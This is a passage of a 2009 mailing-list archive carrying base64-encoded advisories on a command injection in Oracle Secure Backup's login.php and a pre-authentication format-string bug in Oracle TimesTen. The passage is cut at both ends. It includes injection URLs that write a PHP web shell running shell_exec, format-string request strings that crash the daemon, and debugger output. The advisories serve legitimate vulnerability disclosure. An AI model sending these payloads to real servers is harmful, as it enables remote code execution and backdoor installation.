IFNlY3VyZSBCYWNrdXANCldlYiBzZXJ2ZXIuIEluIGZhY3QsIHRoZSBzY3JpcHQgdGhpbmtzIHRo
YXQgd2UncmUgZG9pbmcgYSBsb2dvdXQuDQoNClByb29mIG9mIENvbmNlcHQNCj09PT09PT09PT09
PT09PT0NCg0KKiBDcmVhdGUgYSBmaWxlIGluIHRoZSBkaXJlY3RvcnkgImM6XCINCg0KaHR0cHM6
Ly88dGFyZ2V0Pi9sb2dpbi5waHA/Y2xlYXI9bm8mb3JhX29zYl9sY29va2llPWFhJm9yYV9vc2Jf
Ymdjb29raWU9YmImYnV0dG9uPUxvZ291dCZyYnRvb2w9Y21kLmV4ZSsvYytlY2hvK2hlbGxvK3dv
cmxkKyUzRStjOlxvcmFjbGUuc2VjdXJlLmJhY2t1cC50eHQrOw0KDQoqIENyZWF0ZSBhIFBIUCBi
YWNrZG9vcg0KDQpodHRwczovLzx0YXJnZXQ+L2xvZ2luLnBocD9jbGVhcj1ubyZvcmFfb3NiX2xj
b29raWU9YWEmb3JhX29zYl9iZ2Nvb2tpZT1iYiZidXR0b249TG9nb3V0JnJidG9vbD1jbWQuZXhl
Ky9jK2VjaG8rJTIyJTNDJTNGcGhwK3ByaW50KHNoZWxsX2V4ZWMoJTI0X0dFVCU1QidhJyU1RCkp
JTNCKyUzRiUzRSUyMislM0UrdGVzdC5waHAlM0IlMjYlMjYrZWNobw0KDQpXb3JrYXJvdW5kDQo9
PT09PT09PT09DQoNCkRpc2FibGUgdGhlIHdlYiBzZXJ2ZXIuDQoNClBhdGNoIGluZm9ybWF0aW9u
DQo9PT09PT09PT09PT09PT09PQ0KDQpPcmFjbGUgZml4ZWQgdGhlIHZ1bG5lcmFiaWxpdHkgaW4g
dmVyc2lvbiAxMC4yLjAuMyBvZiBPcmFjbGUgU2VjdXJlIEJhY2t1cC4NCg0KQ29udGFjdCBJbmZv
cm1hdGlvbg0KPT09PT09PT09PT09PT09PT09PQ0KDQpUaGUgdnVsbmVyYWJpbGl0eSB3YXMgZm91
bmQgYnkgSm94ZWFuIEtvcmV0LCBhZG1pblthdF1qb3hlYW5rb3JldFtkb3RdY29tDQoNClJlZmVy
ZW5jZXMNCj09PT09PT09PT0NCg0KT3JhY2xlIFNlY3VyZSBCYWNrdXAgZXhlY19xcigpIENvbW1h
bmQgSW5qZWN0aW9uIFZ1bG5lcmFiaWxpdHk6DQpodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0aXZl
LmNvbS9hZHZpc29yaWVzL1pESS0wOS0wMDMvDQoNCk9yYWNsZSBDcml0aWNhbCBQYXRjaCBVcGRh
dGUgSmFudWFyeSAyMDA5Og0KaHR0cDovL3d3dy5vcmFjbGUuY29tL3RlY2hub2xvZ3kvZGVwbG95
L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMvY3B1amFuMjAwOS5odG1sDQoNClBlcm1h
bmVudCBWZXJzaW9uIG9mIHRoZSBhZHZpc29yeToNCmh0dHA6Ly9qb3hlYW5rb3JldC5jb20vYmxv
Zy8/cD0zOQ0KDQpQcm9mZXNzaW9uYWwgV2ViOg0KaHR0cDovL3d3dy5qb3hlYW5rb3JldC5jb20N
Cg0KUGVyc29uYWwgQmxvZzoNCmh0dHA6Ly93d3cuam94ZWFua29yZXQuY29tL2Jsb2cNCg0KRGlz
Y2xhaW1lcg0KPT09PT09PT09PQ0KDQpUaGUgaW5mb3JtYXRpb24gaW4gdGhpcyBhZHZpc29yeSBh
bmQgYW55IG9mIGl0cyBkZW1vbnN0cmF0aW9ucyBpcyBwcm92aWRlZCAiYXMgaXMiDQp3aXRob3V0
IGFueSB3YXJyYW50eSBvZiBhbnkga2luZC4NCg0KSSBhbSBub3QgbGlhYmxlIGZvciBhbnkgZGly
ZWN0IG9yIGluZGlyZWN0IGRhbWFnZXMgY2F1c2VkIGFzIGEgcmVzdWx0IG9mIHVzaW5nIHRoZQ0K
aW5mb3JtYXRpb24gb3IgZGVtb25zdHJhdGlvbnMgcHJvdmlkZWQgaW4gYW55IHBhcnQgb2YgdGhp
cyBhZHZpc29yeS4NCg0K


--=-khnqrW9NU0VZCuXuDSRv--

--=-YhepHLVg9ODiz52nJhvx
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQBJblBjU6rFMEYDrlERAhy3AJ4+eNpeftbfS0Im+TaEwSiJA3GTBgCfSohG
h1dFPwTx7ucfiIqE2iHmicA=iqhK
-----END PGP SIGNATURE-----

--=-YhepHLVg9ODiz52nJhvx--



______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
Llamadas a fijos y msviles desde 1 cintimo por minuto. 
http://es.voice.yahoo.com

From - Wed Jan 14 17:12:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058eb
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39183-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 955A5EC9C2
for <lists@securityspace.com>; Wed, 14 Jan 2009 17:10:00 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 8DC1D2372AC; Wed, 14 Jan 2009 14:16:13 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11509 invoked from network); 14 Jan 2009 20:28:27 -0000
X-Yahoo-Newman-Id: 829902.63290.bm@omp203.mail.re3.yahoo.com
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.es;
  h=Received:X-YMail-OSG:X-Yahoo-Newman-Property:Subject:From:To:Content-Type:Date:Message-Id:Mime-Version:X-Mailer;
  b=Pyj2ZlktCe3qtYA7ZkcfMd0o+klkdOMI5guiOGpFxU61aSP+lLvg7kdf+MW/nvbhWoHf5ukcsLk9uz33r9h7FhOznFpvx9Yrwcb8NTDBB2k8WH4UTZPRMVqYX7nu4LkuNZ6LZMHBdLM7UPoKlrNxOmZDwQGh9EUWKbR7tWM7KhM=  ;
X-YMail-OSG: YV7eL24VM1l1h1c2phK8t3h8ChD5b4_Sefv.H5zs_1itsG7TOxyepTS8CzHyUzN_snAqlO9OQyAqcE1S9.gjRwqw.AFWPZLByxD.MHxGVT4IzSkrwx1NgOqemjsTl_arPT.wMegOUFMNXcyeXib0nhoJw9FgmCGSDxSlVrms6a8fVhHEiZJSneptNQJxaPWrXp7XGIoy5foU8JikiMMs.NYjIKA-
X-Yahoo-Newman-Property: ymail-3
Subject: Oracle TimesTen Remote Format String
From: Joxean Koret <joxeankoret@yahoo.es>
To: Full Disclosure <full-disclosure@lists.grok.org.uk>,
bugtraq@securityfocus.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-FHE+nIKLYvfBYNKSgYeb"
Date: Wed, 14 Jan 2009 21:53:05 +0100
Message-Id: <1231966385.18860.11.camel@joxean-desktop.etxea.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.22.3.1 
Status:   


--=-FHE+nIKLYvfBYNKSgYeb
Content-Type: multipart/mixed; boundary="=-Y1d5wnjF15zP9y7LtuBL"


--=-Y1d5wnjF15zP9y7LtuBL
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Hi again,

Attached goes and advisory for the unique vulnerability in Oracle
TimesTen fixed in the Oracle Critical Patch Update January 2009.

Cheers!
Joxean Koret



--=-Y1d5wnjF15zP9y7LtuBL
Content-Disposition: attachment; filename=oracle-times-ten-2009-01-14.txt
Content-Transfer-Encoding: base64
Content-Type: text/plain; name=oracle-times-ten-2009-01-14.txt; charset=UTF-8

T3JhY2xlIFRpbWVzVGVuIFJlbW90ZSBGb3JtYXQgU3RyaW5nDQo9PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT0NCg0KUHJvZHVjdCBEZXNjcmlwdGlvbg0KPT09PT09PT09PT09PT09
PT09PQ0KDQpPcmFjbGUgVGltZXNUZW4gcHJvdmlkZXMgYSBmYW1pbHkgb2YgcmVhbC10aW1lIGlu
ZnJhc3RydWN0dXJlIHNvZnR3YXJlIHByb2R1Y3RzDQpkZXNpZ25lZCBmb3IgbG93IGxhdGVuY3ks
IGhpZ2gtdm9sdW1lIGRhdGEsIGV2ZW50IGFuZCB0cmFuc2FjdGlvbiBtYW5hZ2VtZW50Lg0KDQpT
dW1tYXJ5DQo9PT09PT09DQoNClRoZSBPcmFjbGUgSmFudWFyeSAyMDA5IENyaXRpY2FsIFBhdGNo
IFVwZGF0ZSBmaXhlcyBhIHZ1bG5lcmFiaWxpdHkgd2hpY2gNCmFsbG93cyBhIHJlbW90ZSBwcmVh
dXRoZW50aWNhdGVkIGF0dGFja2VyIHRvIGV4ZWN1dGUgYXJiaXRyYXJ5IGNvZGUgaW4gdGhlDQpj
b250ZXh0IG9mIHRoZSB1c2VyIHJ1bm5pbmcgT3JhY2xlIFRpbWVzVGVuIHNlcnZlci4NCg0KQWZm
ZWN0ZWQgdmVyc2lvbnMNCj09PT09PT09PT09PT09PT09DQoNCk9yYWNsZSBUaW1lc1RlbiBwcmlv
ciB0byB2ZXJzaW9uIDcuMC41LjEuMC4NCg0KDQpWdWxuZXJhYmlsaXR5DQo9PT09PT09PT09PT09
DQoNCk9yYWNsZSBUaW1lc1RlbidzIHRpbWVzdGVuZCBkYWVtb24gaXMgYSBzaW1wbGUgd2ViIHNl
cnZlciB0aGF0IHByb2Nlc3MgdGhlDQpjb21tYW5kcyByZWNlaXZlZCBmcm9tIGNsaWVudHMuIE1h
bnkgb2YgdGhlc2UgY29tbWFuZHMgYXJlIHVzZWQgd2l0aG91dA0KYmVpbmcgYXV0aGVudGljYXRl
ZCwgaS5lLiwgd2l0aG91dCB0aGUgbmVlZCBmb3IgYSB1c2VybmFtZSBhbmQgcGFzc3dvcmQuIA0K
DQpUaGUgY29tbWFuZCAiZXZ0ZHVtcCIgZHVtcHMgdG8gdGhlIGludGVybmFsIGxvZyBmaWxlIHRo
ZSBjb250ZW50cyBvZiBhbg0KaW50ZXJuYWwgZGF0YSBzdHJ1Y3R1cmUuIFRoZSBwc2V1ZG8tY2dp
IGV2dGR1bXAgb25seSByZWNlaXZlcyBvbmUgcGFyYW1ldGVyLA0KY2FsbGVkIG1zZy4gVGhlIHBh
cmFtZXRlciAibXNnIiBpcyBhIHRleHQgdGhhdCB3aWxsIGJlIHByaW50ZWQgdG8gdGhlIGxvZw0K
ZmlsZSBiZWZvcmUgZHVtcGluZyB0aGUgaW50ZXJuYWwgc3RydWN0dXJlLg0KDQpUaGlzIHBhcmFt
ZXRlciBpcyB2dWxuZXJhYmxlIHRvIGEgZm9ybWF0IHN0cmluZyBhdHRhY2sgd2hpY2ggbGVhZHMg
dG8gcmVtb3RlDQpjb2RlIGV4ZWN1dGlvbiBiZWZvcmUgYmVpbmcgYXV0aGVudGljYXRlZC4gVGhl
IHZ1bG5lcmFiaWxpdHkgaGF2ZSBiZWVuIHRlc3RlZA0KaW4gTGludXggZW52aXJvbm1lbnRzLCBh
bHRob3VnaCBpdCBhcHBlYXJzIHRvIGJlIHZ1bG5lcmFibGUgaW4gYWxsIHRoZQ0Kc3VwcG9ydGVk
IHBsYXRmb3Jtcy4NCg0KVGhlIGZvbGxvd2luZyBpcyBhbiBleHRyYWN0IG9mIGEgY29tbXVuaWNh
dGlvbiBiZXR3ZWVuIGEgY3VzdG9tIGNsaWVudCBhbmQgDQp0aGUgdGltZXN0ZW5kIGRhZW1vbiAo
dGhlIG91dHB1dCBmcm9tIHRoZSBzZXJ2ZXIgaXMgc2hvd24gaW4gdGhlIGZpbGUgDQovdmFyL1Rp
bWVzVGVuL2xvZy90dG1lc2cubG9nIGluIFVuaXggYW5kIEdOVS9MaW51eCBlbnZpcm9ubWVudHMp
OiANCg0KRlJPTSBDTElFTlQ6DQoNCkdFVCBldnRkdW1wP21zZz1BQUFBJTI1MTAkeCUyNXMgSFRU
UC8xLjBcclxuXHJcbg0KDQpBVCBTRVJWRVI6DQoNCiguLi4pDQojIGNhdCAvdmFyL1RpbWVzVGVu
L2xvZy90dG1lc2cubG9nDQooLi4uKQ0KMTk6MDU6MDcuMDEgSW5mbzogICAgOiAxODIyNTogbWFp
bmQgMjI6IHNvY2tldCBjbG9zZWQsIGNhbGxpbmcgcmVjb3ZlcnkgKGxhc3QgY21kIHdhcyAyNSkN
CjE5OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6IEFBQUE4MGE4YTBjKG51bGwpDQoxOTowNTox
OS4wNyBJbmZvOiAgICA6IDE4MjI1OiBtb2RlICAgICA6ICBUVERMX05PUk1BTA0KMTk6MDU6MTku
MDcgSW5mbzogICAgOiAxODIyNTogY3RsZmlsZW5hbWUgOiAgJycNCjE5OjA1OjE5LjA3IEluZm86
ICAgIDogMTgyMjU6IGxpbmVubyAgIDogIDANCjE5OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6
IG5pdGVtcyAgIDogIDcNCjE5OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6IG1heGl0ZW1zIDog
IDMyDQoxOTowNToxOS4wNyBJbmZvOiAgICA6IDE4MjI1OiBjdXJfcGF0aCA6ICAobnVsbCkNCjE5
OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6IGxpbmVubyAgIDogIDANCjE5OjA1OjE5LjA3IElu
Zm86ICAgIDogMTgyMjU6IGl0ZW1zICAgIDoNCjE5OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6
ICAgaXRlbSAjIDAgIDoNCjE5OjA1OjE5LjA3IEluZm86ICAgIDogMTgyMjU6ICAgICBjb21wICAg
ICA6IEFMTA0KMTk6MDU6MTkuMDcgSW5mbzogICAgOiAxODIyNTogICAgIGxldmVsICAgIDogMw0K
MTk6MDU6MTkuMDcgSW5mbzogICAgOiAxODIyNTogICAgIGRzbmFtZSAgIDogKG51bGwpDQooLi4u
KQ0KDQpGUk9NIENMSUVOVDoNCg0KR0VUIGV2dGR1bXA/bXNnPUFBQUElMjUxMCR4JTI1cyUyNXMl
MjVzIEhUVFAvMS4wDQoNCkFUIFNFUlZFUjoNCg0KKC4uLikNCiMgY2F0IC92YXIvVGltZXNUZW4v
bG9nL3R0bWVzZy5sb2cNCjE5OjA1OjE5LjA4IEluZm86ICAgIDogMTgyMjU6IG1haW5kIDIzOiBz
b2NrZXQgY2xvc2VkLCBjYWxsaW5nIHJlY292ZXJ5IChsYXN0IGNtZCB3YXMgMjYpDQoxOTowNjox
OC40OSBJbmZvOiAgICA6IDE4MjI1OiBBQUFBODBhOGEwYyhudWxsKShudWxsKQ0KMTk6MDY6MTgu
NDkgSW5mbzogICAgOiAxODIyNTogbW9kZSAgICAgOiAgVFRETF9OT1JNQUwNCjE5OjA2OjE4LjQ5
IEluZm86ICAgIDogMTgyMjU6IGN0bGZpbGVuYW1lIDogICcnDQoxOTowNjoxOC40OSBJbmZvOiAg
ICA6IDE4MjI1OiBsaW5lbm8gICA6ICAwDQoxOTowNjoxOC40OSBJbmZvOiAgICA6IDE4MjI1OiBu
aXRlbXMgICA6ICA3DQoxOTowNjoxOC40OSBJbmZvOiAgICA6IDE4MjI1OiBtYXhpdGVtcyA6ICAz
Mg0KMTk6MDY6MTguNDkgSW5mbzogICAgOiAxODIyNTogY3VyX3BhdGggOiAgKG51bGwpDQoxOTow
NjoxOC40OSBJbmZvOiAgICA6IDE4MjI1OiBsaW5lbm8gICA6ICAwDQoxOTowNjoxOC40OSBJbmZv
OiAgICA6IDE4MjI1OiBpdGVtcyAgICA6DQoxOTowNjoxOC40OSBJbmZvOiAgICA6IDE4MjI1OiAg
IGl0ZW0gIyAwICA6DQoxOTowNjoxOC40OSBJbmZvOiAgICA6IDE4MjI1OiAgICAgY29tcCAgICAg
OiBBTEwNCjE5OjA2OjE4LjQ5IEluZm86ICAgIDogMTgyMjU6ICAgICBsZXZlbCAgICA6IDMNCjE5
OjA2OjE4LjQ5IEluZm86ICAgIDogMTgyMjU6ICAgICBkc25hbWUgICA6IChudWxsKQ0KKC4uLikN
Cg0KRlJPTSBDTElFTlQ6DQoNCkdFVCBldnRkdW1wP21zZz1BQUFBJTI1biBIVFRQLzEuMA0KDQpB
VCBTRVJWRVI6DQoNCiguLi4pDQojIGNhdCAvdmFyL1RpbWVzVGVuL2xvZy90dG1lc2cubG9nDQox
OTowNzozOC44NyBFcnIgOiAgICA6IDE4NzgyOiBUVDE0MDAwOiBUaW1lc1RlbiBkYWVtb24gaW50
ZXJuYWwgZXJyb3I6IHN1YmQ6IE1haW4gZGFlbW9uIGhhcyB2YW5pc2hlZA0KMTk6MDc6MzguODcg
RXJyIDogICAgOiAxODc4NTogVFQxNDAwMDogVGltZXNUZW4gZGFlbW9uIGludGVybmFsIGVycm9y
OiBzdWJkOiBNYWluIGRhZW1vbiBoYXMgdmFuaXNoZWQNCjE5OjA3OjM4Ljg3IEVyciA6ICAgIDog
MTg3ODg6IFRUMTQwMDA6IFRpbWVzVGVuIGRhZW1vbiBpbnRlcm5hbCBlcnJvcjogc3ViZDogTWFp
biBkYWVtb24gaGFzIHZhbmlzaGVkDQoxOTowNzozOC44NyBFcnIgOiAgICA6IDE4NzkxOiBUVDE0
MDAwOiBUaW1lc1RlbiBkYWVtb24gaW50ZXJuYWwgZXJyb3I6IHN1YmQ6IE1haW4gZGFlbW9uIGhh
cyB2YW5pc2hlZA0KMTk6MDc6MzguODcgSW5mbzogU1JWOiAxODgwMDogRXZlbnRJRD05OXwgVGlt
ZXNUZW4gZGFlbW9uIGhhcyBkaXNjb25uZWN0ZWQsIHNlcnZlciBpcyBleGl0aW5nLi4uDQoxOTow
NzozOS41NCBJbmZvOiAgICA6IDE4Nzg1OiBMaXN0ZW5lciB0ZXJtaW5hdGluZw0KMTk6MDc6Mzku
NTQgSW5mbzogICAgOiAxODc4NTogTGlzdGVuZXIgZXhpdGVkLCB0ZXJtaW5hdGlvbiBmaW5pc2hp
bmcNCjE5OjA3OjM5LjU0IEluZm86ICAgIDogMTg3ODU6IFByb2Nlc3MgdGVybWluYXRpb24gY29t
cGxldGUNCjE5OjA3OjM5LjU5IEluZm86ICAgIDogMTg3OTE6IExpc3RlbmVyIHRlcm1pbmF0aW5n
DQoxOTowNzozOS41OSBJbmZvOiAgICA6IDE4NzgyOiBMaXN0ZW5lciB0ZXJtaW5hdGluZw0KMTk6
MDc6MzkuNTkgSW5mbzogICAgOiAxODc4ODogTGlzdGVuZXIgdGVybWluYXRpbmcNCjE5OjA3OjM5
LjU5IEluZm86ICAgIDogMTg3OTE6IExpc3RlbmVyIGV4aXRlZCwgdGVybWluYXRpb24gZmluaXNo
aW5nDQoxOTowNzozOS41OSBJbmZvOiAgICA6IDE4NzkxOiBQcm9jZXNzIHRlcm1pbmF0aW9uIGNv
bXBsZXRlDQoxOTowNzozOS41OSBJbmZvOiAgICA6IDE4NzgyOiBMaXN0ZW5lciBleGl0ZWQsIHRl
cm1pbmF0aW9uIGZpbmlzaGluZw0KMTk6MDc6MzkuNTkgSW5mbzogICAgOiAxODc4MjogUHJvY2Vz
cyB0ZXJtaW5hdGlvbiBjb21wbGV0ZQ0KMTk6MDc6MzkuNTkgSW5mbzogICAgOiAxODc4ODogTGlz
dGVuZXIgZXhpdGVkLCB0ZXJtaW5hdGlvbiBmaW5pc2hpbmcNCjE5OjA3OjM5LjU5IEluZm86ICAg
IDogMTg3ODg6IFByb2Nlc3MgdGVybWluYXRpb24gY29tcGxldGUNCjE5OjA3OjQwLjU5IEluZm86
IFNSVjogMTg4MDA6IEV2ZW50SUQ9MnwgVGltZXNUZW4gU2VydmVyIGlzIHN0b3BwaW5nDQoxOTow
Nzo0MC41OSBJbmZvOiBTUlY6IDE4ODAwOiBFdmVudElEPTk5fCBTZXJ2ZXIgdHJ5aW5nIHRvIHN0
b3AgY2hpbGQgc2VydmVyIHByb2Nlc3Nlcw0KMTk6MDc6NDAuNTkgSW5mbzogU1JWOiAxODgwMDog
RXZlbnRJRD0xMXwgTWFpbiBTZXJ2ZXIgY2xlYW5lZCB1cCBhbGwgY2hpbGQgc2VydmVyIHByb2Nl
c3NlcyBhbmQgZXhpdGluZw0KKC4uLikNCg0KVGhlIGxhc3QgbXNnIHBhcmFtZXRlcidzIHZhbHVl
IGNyYXNoZXMgdGhlIHRpbWVzdGVuZCBkYWVtb24uIEF0dGFjaGluZyB3aXRoDQphIGRlYnVnZ2Vy
IHRvIHRoZSB0aW1lc3RlbmQgZGFlbW9uIHdlIGNhbiBzZWUgdGhlIGZvbGxvd2luZyBkdW1wIHdo
ZW4gaXQNCmNyYXNoZXM6IA0KDQokIHN1ZG8gL2V0Yy9pbml0LmQvdHRfNzAgc3RhcnQgJg0KKC4u
LikNCiQgc3VkbyBnZGIgYXR0YWNoIGBjYXQgL3Zhci9UaW1lc1Rlbi90dDcwL3RpbWVzdGVuZC5w
aWRgDQooLi4uKQ0KKGdkYikgYw0KKC4uLikNClByb2dyYW0gcmVjZWl2ZWQgc2lnbmFsIFNJR1NF
R1YsIFNlZ21lbnRhdGlvbiBmYXVsdC4NCltTd2l0Y2hpbmcgdG8gVGhyZWFkIC0xMjIzMzg2MTky
IChMV1AgMTg5ODApXQ0KMHhiNzZjZjVjNiBpbiB2ZnByaW50ZiAoKSBmcm9tIC9saWIvdGxzL2k2
ODYvY21vdi9saWJjLnNvLjYNCihnZGIpIHdoZXJlDQojMCAgMHhiNzZjZjVjNiBpbiB2ZnByaW50
ZiAoKSBmcm9tIC9saWIvdGxzL2k2ODYvY21vdi9saWJjLnNvLjYNCiMxICAweGI3NmVjYTM2IGlu
IHZzbnByaW50ZiAoKSBmcm9tIC9saWIvdGxzL2k2ODYvY21vdi9saWJjLnNvLjYNCiMyICAweGI3
ODI2ZGRiIGluIHR0Y192c25wcmludGYgKCkgZnJvbSAvb3B0L1RpbWVzVGVuL3R0NzAvbGliL2xp
YnR0Y28uc28NCiMzICAweDA4MDc2ODlmIGluIHR0ZExvZ0R1bXAgKCkNCiM0ICAweDA4MDViMTM4
IGluIGRhSGFuZGxlciAoKQ0KIzUgIDB4MDgwNzM3ODkgaW4gaGFuZGxlclRocmVhZCAoKQ0KIzYg
IDB4Yjc3ZTczNDEgaW4gc3RhcnRfdGhyZWFkICgpIGZyb20gL2xpYi90bHMvaTY4Ni9jbW92L2xp
YnB0aHJlYWQuc28uMA0KIzcgIDB4Yjc3NWE0ZWUgaW4gY2xvbmUgKCkgZnJvbSAvbGliL3Rscy9p
Njg2L2Ntb3YvbGliYy5zby42DQooZ2RiKSBpIHINCmVheCAgICAgICAgICAgIDB4MCAgICAgIDAN
CmVjeCAgICAgICAgICAgIDB4NCAgICAgIDQNCmVkeCAgICAgICAgICAgIDB4MCAgICAgIDANCmVi
eCAgICAgICAgICAgIDB4Yjc3YmJhZGMgICAgICAgLTEyMTY2MjgwMDQNCmVzcCAgICAgICAgICAg
IDB4YjcxNDgwYzAgICAgICAgMHhiNzE0ODBjMA0KZWJwICAgICAgICAgICAgMHhiNzE0ODZlMCAg
ICAgICAweGI3MTQ4NmUwDQplc2kgICAgICAgICAgICAweDAgICAgICAwDQplZGkgICAgICAgICAg
ICAweGI3MTQ4OTVjICAgICAgIC0xMjIzMzkwODg0DQplaXAgICAgICAgICAgICAweGI3NmNmNWM2
ICAgICAgIDB4Yjc2Y2Y1YzYgPHZmcHJpbnRmKzE0MDM4Pg0KKC4uLikNCg0KVGhlIGZ1bmN0aW9u
IHR0ZExvZ0R1bXAgaXMgY2FsbGVkIGZyb20gZGFIYW5kbGVyIGFzIHlvdSBjYW4gc2VlIGluIHRo
ZSANCmJhY2t0cmFjZS4gVGhpcyBmdW5jdGlvbiBpcyB0aGUgbWFpbiBoYW5kbGVyIGZvciB0aGUg
aW50ZXJuYWwgdGltZXN0ZW5kJ3Mgd2ViDQpzZXJ2ZXIuIFRoaXMgaXMgdGhlIHZ1bG5lcmFibGUg
ZnVuY3Rpb24sIHR0ZExvZ0R1bXAsIHdoaWNoIHJlY2VpdmVzIG9uZSANCmFyZ3VtZW50ICh0aGUg
bXNnIHBhcmFtZXRlciB0byB0aGUgZXZ0ZHVtcCBwc2V1ZG8gY2dpKToNCg0KKC4uLikNCi50ZXh0
OjA4MDc2ODZEIHR0ZExvZ0R1bXAgICAgICBwcm9jIG5lYXIgICAgICAgICAgICAgICA7IENPREUg
WFJFRjogZGFIYW5kbGVyKzVGMxhwDQooLi4uKQ0KLnRleHQ6MDgwNzY4NzkgICAgICAgICAgICAg
ICAgIGxlYSAgICAgZWF4LCBbZWJwK2FyZ1JldF0NCi50ZXh0OjA4MDc2ODdDICAgICAgICAgICAg
ICAgICBwdXNoICAgIGVheA0KLnRleHQ6MDgwNzY4N0QgICAgICAgICAgICAgICAgIHB1c2ggICAg
W2VicCthcmdNc2ddIDsgVXNlciBjb250cm9sbGVkIHN0cmluZyBidWZmZXINCi50ZXh0OjA4MDc2
ODgwICAgICAgICAgICAgICAgICBwdXNoICAgIDANCi50ZXh0OjA4MDc2ODgyICAgICAgICAgICAg
ICAgICBwdXNoICAgIDEwMGgNCi50ZXh0OjA4MDc2ODg3ICAgICAgICAgICAgICAgICBsZWEgICAg
IGVzaSwgW2VicCtidWZdDQoudGV4dDowODA3Njg4RCAgICAgICAgICAgICAgICAgY2FsbCAgICAk
KzUNCi50ZXh0OjA4MDc2ODkyICAgICAgICAgICAgICAgICBwb3AgICAgIGVieA0KLnRleHQ6MDgw
NzY4OTMgICAgICAgICAgICAgICAgIGFkZCAgICAgZWJ4LCAzMjE3QWgNCi50ZXh0OjA4MDc2ODk5
ICAgICAgICAgICAgICAgICBwdXNoICAgIGVzaQ0KLnRleHQ6MDgwNzY4OUEgICAgICAgICAgICAg
ICAgIGNhbGwgICAgX3R0Y192c25wcmludGYNCiguLi4pDQoNClRoZSBmdW5jdGlvbiB0dGNfdnNu
cHJpbnRmIG1ha2VzIGEgY2FsbCBpbnRlcm5hbGx5IHRvIHRoZSB2c25wcmludGYgZnVuY3Rpb24N
CihpbiB0aGUgbGlicmFyeSAvb3B0L1RpbWVzVGVuL3R0NzAvbGliL2xpYnR0Y28uc28pIHBhc3Np
bmcgYXMgdGhlIGJ1ZmZlciB0bw0KYmUgcHJpbnRlZCB0aGUgdXNlciBzdXBwbGllZCB2YWx1ZSBw
YXNzZWQgdG8gdGhlICJtc2ciIGFyZ3VtZW50Og0KICAgIA0KLnRleHQ6MDAwMUFEQUEgdHRjX3Zz
bnByaW50ZiAgIHByb2MgbmVhciAgICAgICAgICAgICAgIDsgQ09ERSBYUkVGOiBtc2didWZfZXJy
b3IrNzMYcA0KLnRleHQ6MDAwMUFEQUEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgIDsgb3B0X2Vycm9yKzgzGHAgLi4uDQoudGV4dDowMDAxQURBQQ0KKC4uLikNCi50ZXh0
OjAwMDFBRENFICAgICAgICAgICAgICAgICBwdXNoICAgIFtlYnArYXJnXSAgICAgICA7IGFyZw0K
LnRleHQ6MDAwMUFERDEgICAgICAgICAgICAgICAgIHB1c2ggICAgW2VicCthcmdGb3JtYXRdIDsg
Zm9ybWF0DQoudGV4dDowMDAxQURENCAgICAgICAgICAgICAgICAgcHVzaCAgICBlZGkgICAgICAg
ICAgICAgOyBtYXhsZW4NCi50ZXh0OjAwMDFBREQ1ICAgICAgICAgICAgICAgICBwdXNoICAgIGVh
eCAgICAgICAgICAgICA7IHMNCi50ZXh0OjAwMDFBREQ2ICAgICAgICAgICAgICAgICBjYWxsICAg
IF92c25wcmludGYNCiguLikNCg0KV29ya2Fyb3VuZA0KPT09PT09PT09PQ0KDQpOb25lLg0KDQpQ
YXRjaCBpbmZvcm1hdGlvbg0KPT09PT09PT09PT09PT09PT0NCg0KT3JhY2xlIGZpeGVkIHRoZSB2
dWxuZXJhYmlsaXR5IGluIHZlcnNpb24gNy4wLjUuMS4wIG9mIE9yYWNsZSBTZWN1cmUgQmFja3Vw
Lg0KDQpDb250YWN0IEluZm9ybWF0aW9uDQo9PT09PT09PT09PT09PT09PT09DQoNClRoZSB2dWxu
ZXJhYmlsaXR5IHdhcyBmb3VuZCBieSBKb3hlYW4gS29yZXQsIGFkbWluW2F0XWpveGVhbmtvcmV0
W2RvdF1jb20NCg0KUmVmZXJlbmNlcw0KPT09PT09PT09PQ0KDQpPcmFjbGUgVGltZXNUZW4gZXZ0
RHVtcCBSZW1vdGUgRm9ybWF0IFN0cmluZyBWdWxuZXJhYmlsaXR5Og0KaHR0cDovL3d3dy56ZXJv
ZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmllcy9aREktMDktMDA0Lw0KDQpPcmFjbGUgQ3JpdGlj
YWwgUGF0Y2ggVXBkYXRlIEphbnVhcnkgMjAwOToNCmh0dHA6Ly93d3cub3JhY2xlLmNvbS90ZWNo
bm9sb2d5L2RlcGxveS9zZWN1cml0eS9jcml0aWNhbC1wYXRjaC11cGRhdGVzL2NwdWphbjIwMDku
